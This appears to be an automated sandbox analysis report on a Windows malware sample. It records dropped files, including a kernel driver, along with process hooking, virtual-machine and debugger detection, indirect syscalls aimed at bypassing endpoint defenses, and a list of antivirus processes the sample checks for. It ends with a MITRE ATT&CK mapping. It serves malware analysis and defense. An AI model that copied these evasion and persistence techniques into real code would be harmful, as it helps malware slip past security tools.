Source: unknown	Process created: C:\Users\user\Documents\Y1mbCC.exe C:\Users\user\Documents\Y1mbCC.exe
Source: unknown	Process created: C:\Users\user\Documents\Y1mbCC.exe C:\Users\user\Documents\Y1mbCC.exe
Source: unknown	Process created: C:\Users\user\Documents\Y1mbCC.exe C:\Users\user\Documents\Y1mbCC.exe

Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 0000000000000000.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 0000000000000000.exe

Static file information: File size 31322802 > 1048576

Source: 0000000000000000.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: 0000000000000000.exe
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: Y1mbCC.exe, 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe, 00000005.00000000.2703482722.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe, 00000006.00000000.2709243645.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe, 00000006.00000002.2714839265.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe, 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe, 00000007.00000000.2873257774.0000000140014000.00000002.00000001.01000000.00000008.sdmp, Y1mbCC.exe.0.dr

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\Y1mbCC.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0000000000000000.exe	File created: C:\Users\user\Documents\Y1mbCC.exe	Jump to dropped file

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\Y1mbCC.exe

5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 6992 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 6992 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 3584 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 3584 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 6108 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	Memory written: PID: 6108 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0000000000000000.exe	RDTSC instruction interceptor: First address: 1400010FF second address: 140001115 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0000000000000000.exe	RDTSC instruction interceptor: First address: 140001115 second address: 140001115 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007F25C10FA8E6h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc

Source: C:\Users\user\Desktop\0000000000000000.exe

Window / User API: threadDelayed 685

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\Y1mbCC.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_5-14095

Source: C:\Users\user\Documents\Y1mbCC.exe	API coverage: 2.7 %
Source: C:\Users\user\Documents\Y1mbCC.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\0000000000000000.exe TID: 6828	Thread sleep count: 685 > 30	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe TID: 6828	Thread sleep time: -342500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe TID: 6828	Thread sleep count: 314 > 30	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe TID: 6828	Thread sleep time: -157000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\Y1mbCC.exe

Last function: Thread delayed

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11ECA1B8 FindFirstFileExW,		5_2_00007FFE11ECA1B8
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148CA1B8 FindFirstFileExW,		7_2_00007FFE148CA1B8

Source: 0000000000000000.exe	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_5e38a278d114b813
Source: 0000000000000000.exe	Binary or memory string: VMware
Source: 0000000000000000.exe	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: 0000000000000000.exe	Binary or memory string: VMware Virtual USB Mouse
Source: 0000000000000000.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.17369862.B64.2012240522,BiosReleaseDate:12/24/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1\
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.e
Source: 0000000000000000.exe	Binary or memory string: vmci.syshbin
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.
Source: 0000000000000000.exe	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 0000000000000000.exe	Binary or memory string: VMware-42 17 53 71 ea 62 82 e8-b2 93 b7 a7 7f 7a dc 93
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0000000000000000.exe	Binary or memory string: VMware VMCI Bus Device0
Source: 0000000000000000.exe	Binary or memory string: Manufacturer VMware, Inc.(vk
Source: 0000000000000000.exe	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.16460286.B64.2006250725,BiosReleaseDate:06/25/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1(vk
Source: 0000000000000000.exe	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: 0000000000000000.exe	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 0000000000000000.exe	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: 0000000000000000.exe	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,root\vmwvmcihostdev
Source: 0000000000000000.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813,
Source: 0000000000000000.exe	Binary or memory string: vmci.sys
Source: 0000000000000000.exe	Binary or memory string: \driver\vmci,\driver\pci
Source: 0000000000000000.exe	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: 0000000000000000.exe	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 0000000000000000.exe	Binary or memory string: VMware7,1
Source: 0000000000000000.exe	Binary or memory string: NECVMWar VMware SATA CD00
Source: 0000000000000000.exe	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0000000000000000.exe	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 0000000000000000.exe	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 0000000000000000.exe	Binary or memory string: VMware7,1p
Source: 0000000000000000.exe	Binary or memory string: VMware PCI VMCI Bus Device
Source: 0000000000000000.exe	Binary or memory string: vmci.inf_amd64_5e38a278d114b813
Source: 0000000000000000.exe	Binary or memory string: VMware VMCI Bus Device
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.ps
Source: 0000000000000000.exe	Binary or memory string: VMware, Inc.00
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC

Source: C:\Users\user\Documents\Y1mbCC.exe	API call chain: ExitProcess graph end node	graph_5-14096
Source: C:\Users\user\Documents\Y1mbCC.exe	API call chain: ExitProcess graph end node	graph_5-14439
Source: C:\Users\user\Documents\Y1mbCC.exe	API call chain: ExitProcess graph end node	graph_7-14030
Source: C:\Users\user\Documents\Y1mbCC.exe	API call chain: ExitProcess graph end node	graph_7-14374

Source: C:\Users\user\Desktop\0000000000000000.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_00000001400073E0 LdrLoadDll,

5_2_00000001400073E0

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0000000140007C91

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

5_2_0000000140004630

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0000000140007C91
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00000001400106B0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,	5_2_00000001400092E0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11EC2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFE11EC2630
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11EC1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFE11EC1F50
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11EC76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFE11EC76E0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0000000140007C91
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000001400106B0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400092E0 SetUnhandledExceptionFilter,	7_2_00000001400092E0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148C2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FFE148C2630
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148C76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FFE148C76E0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148C1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FFE148C1F50

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\Y1mbCC.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	NtProtectVirtualMemory: Indirect: 0x2ABB253	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	NtDelayExecution: Indirect: 0x1E94D6	Jump to behavior
Source: C:\Users\user\Documents\Y1mbCC.exe	NtProtectVirtualMemory: Indirect: 0x2C1B253	Jump to behavior

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_00007FFE11ECFD40 cpuid

5_2_00007FFE11ECFD40

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: GetLocaleInfoA,		5_2_000000014000F370
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: GetLocaleInfoA,		7_2_000000014000F370

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_000000014000A370

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_0000000140005A70

Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: Y1mbCC.exe, 00000005.00000002.2708285728.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000006.00000002.2713782906.0000000002888000.00000002.00001000.00020000.00000000.sdmp, Y1mbCC.exe, 00000007.00000002.2897392856.00000000029E8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,	5_2_00000001400042B0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,	5_2_0000000140003F80
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,	7_2_00000001400042B0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,	7_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	24 Windows Service	1 Access Token Manipulation	31 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Service Execution	1 DLL Side-Loading	24 Windows Service	1 Virtualization/Sandbox Evasion	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Native API	Logon Script (Windows)	1 Process Injection	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	123 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
